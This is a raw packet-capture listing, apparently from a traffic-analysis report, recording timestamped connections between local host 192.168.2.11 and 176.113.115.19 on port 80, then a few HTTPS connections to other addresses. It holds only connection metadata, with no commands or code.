Dec 14, 2024 14:08:22.733412981 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.733464003 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.733551025 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.733592033 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.736069918 CET  80           49711      176.113.115.19   192.168.2.11
Dec 14, 2024 14:08:22.736128092 CET  49711        80         192.168.2.11     176.113.115.19
Dec 14, 2024 14:08:22.736192942 CET  80           49711      176.113.115.19   192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.736243963 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738687992 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738744020 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738769054 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.738811016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741300106 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741374016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741400957 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.741446018 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.743891001 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.743941069 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.743978977 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.744028091 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746535063 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746592999 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746629953 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.746686935 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749119043 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749170065 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749254942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.749305010 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751722097 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751775026 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751816034 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.751863956 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754362106 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754417896 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754543066 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.754585028 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757002115 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757062912 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757097006 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.757143974 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758863926 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758918047 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758950949 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.758990049 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760724068 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760776997 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760864019 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.760916948 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762533903 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762587070 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762624979 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.762667894 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764435053 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764487028 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764508009 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.764548063 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766261101 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766316891 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766347885 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.766396999 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768174887 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768244982 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768254042 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.768332958 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770131111 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770186901 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770225048 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.770271063 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771878958 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771930933 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771948099 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.771991968 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773755074 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773808002 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773813009 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.773848057 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775605917 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775660038 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775692940 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.775773048 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777470112 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777515888 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777596951 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.777642965 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779426098 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779478073 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779514074 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.779561996 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.781223059 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.781270027 CET4971180192.168.2.11176.113.115.19
Dec 14, 2024 14:08:22.781368971 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.781409025 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.783010006 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.783063889 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.894429922 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.894582033 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.894584894 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.894632101 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.895231962 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.895282030 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.895304918 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.895369053 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.896745920 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.896821976 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.896856070 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.896856070 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.898643970 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.898662090 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.898691893 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.898705006 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.900121927 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.900166035 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.900185108 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.900227070 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.901621103 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.901680946 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.901685953 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.901730061 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.903225899 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.903289080 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.903333902 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.903376102 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.904661894 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.904711962 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.904721022 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.904753923 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.906044960 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.906100035 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.906147003 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.906188965 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.907545090 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.907597065 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.907743931 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.907787085 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.909100056 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.909145117 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.909183025 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.909224987 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.910609007 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.910660982 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.910666943 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.910708904 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.912045956 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.912090063 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.912105083 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.912130117 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.913538933 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.913587093 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.913681984 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.913729906 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.915047884 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.915092945 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.915193081 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.915237904 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.916496038 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.916542053 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.916570902 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.916613102 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.918020964 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.918072939 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.918148994 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.918191910 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.919523001 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.919569969 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.919585943 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.919626951 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.921024084 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.921072006 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.921134949 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.921180964 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.922532082 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.922590017 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.922595024 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.922642946 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.924139977 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.924196005 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.924199104 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.924245119 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.925451994 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.925507069 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.925658941 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.925705910 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.926986933 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.927043915 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.927103996 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.927148104 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.928451061 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.928498030 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.928558111 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.928596973 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.930012941 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.930062056 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.930095911 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.930138111 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.931423903 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.931469917 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.931548119 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.931588888 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.932898998 CET    80     49711  176.113.115.19  192.168.2.11
Dec 14, 2024 14:08:22.932948112 CET    49711  80     192.168.2.11    176.113.115.19
Dec 14, 2024 14:08:22.932985067 CET    80     49711  176.113.115.19  192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.933029890 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.934382915 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.934438944 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.934484005 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.934525967 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.935893059 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.935946941 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.935992002 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.936036110 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.937370062 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.937422991 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.937467098 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.937510967 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.938877106 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.938930988 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.938977003 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.939030886 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.940356016 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.940411091 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.940485001 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.940531015 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.941859961 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.941924095 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.941967010 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.942015886 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.943339109 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.943388939 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.943424940 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.943506956 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.944807053 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.944855928 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.944865942 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.944912910 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.946316004 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.946366072 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.946425915 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.946465015 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.947798014 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.947848082 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.947940111 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.947982073 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.949331045 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.949378014 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.949486017 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.949527979 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.950803995 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.950860023 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.950951099 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.950998068 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.952337027 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.952353954 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.952397108 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.952411890 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.953783989 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.953840971 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.953913927 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.953957081 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.955369949 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.955414057 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.955427885 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.955466032 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.956939936 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.956995964 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.957082033 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.957129002 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.958465099 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.958528042 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.958560944 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.958574057 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.959743977 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.959791899 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.959840059 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.959881067 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.961263895 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.961312056 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.961407900 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.961447001 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.962784052 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.962832928 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.962913990 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.962954998 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.964258909 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.964308977 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:31.861149073 CET49727443192.168.2.11104.21.22.222
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:31.861170053 CET44349727104.21.22.222192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035940886 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035976887 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.036102057 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.036396027 CET49739443192.168.2.11104.21.96.1
